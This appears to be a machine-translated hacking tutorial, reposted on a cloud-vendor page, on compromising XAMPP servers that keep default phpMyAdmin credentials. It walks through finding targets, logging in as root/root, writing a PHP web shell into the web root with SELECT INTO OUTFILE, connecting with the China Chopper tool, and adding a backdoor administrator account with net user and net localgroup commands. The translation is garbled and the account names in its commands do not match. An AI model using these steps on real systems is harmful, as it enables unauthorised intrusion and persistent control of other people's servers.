First, let's start with science. XAMPP (Apache+mysql+php+perl) is a powerful built-in XAMPP software Station integration package is an easy-to-install Apache release with MySQL, PHP and PERL. XAMPP is really easy to install and use: Just download, unzip, start. Then in the process of installing XAMPP, many webmasters will be directly default to the MySQL database password, so the vulnerability is created.
All right, nonsense, we're just on the artifact. Zhong Eye server-status–server-info–phpmyadmin account password: root/root port:80
Find a website. The initial phpinfo arrows refer to the phpMyAdmin's landing address.
Let's write down the website root directory C:/Program Files (x86)/xampp/xampps/htdocs
And then we enter the default username and password. Root root
Let's go inside. Enter SQL statement select ' php a word ' into outfile ' C:/Program Files (x86)/xampp/xampps/htdocs/mgsrc.php ' Write a sentence
The chopper, and then we're talking about the right to mention.
(1) First enter the command to add the user:
NET user test01 Mgs?1234567890/add
(2) Adding a normal user to the Super Admin group Administrators
Then enter the net localgroup administrators Mgsrc1/add
(PS: At the time of the right to take a lot of detours. This server's password policy is not closed so the password combination must be a capital letter plus a symbol and then add a number and this server password number can not exceed 14 bits or not respond to it)
Article Forwarding address: http://www.hackdig.com/04/hack-34524.htm
XAMPP Default configuration Take Shell
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
